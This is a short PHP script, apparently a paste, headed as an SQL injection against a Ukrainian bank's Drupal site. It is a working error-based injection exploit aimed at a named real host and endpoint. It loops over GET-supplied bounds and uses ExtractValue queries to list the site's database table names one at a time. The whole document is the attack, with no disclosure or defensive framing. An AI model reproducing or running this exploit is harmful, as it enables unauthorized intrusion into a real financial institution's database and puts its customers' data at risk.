sql inj in integral bank Drupal and start _GET start stop _GET stop fo

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
<?
//sql inj in integral bank (Drupal)
$and = '';
$start = $_GET['start'];
$stop = $_GET['stop'];
for($i = $start; $i <= $stop; $i++) {
$zap = 'http://www.integral.com.ua/fin_data?t=0%27or(ExtractValue(1,concat(0x3a,(select(concat(table_name))from(information_schema.tables)where(data_length%3E0)'.urlencode($and).'%20LIMIT%201))))=%271';
$f = file_get_contents($zap);
preg_match('/&#039;\:(.*?)&/', $f, $data);
$t = $data[1];
$and .= " AND TABLE_NAME!='$t'";
echo "$t\n";
}
?>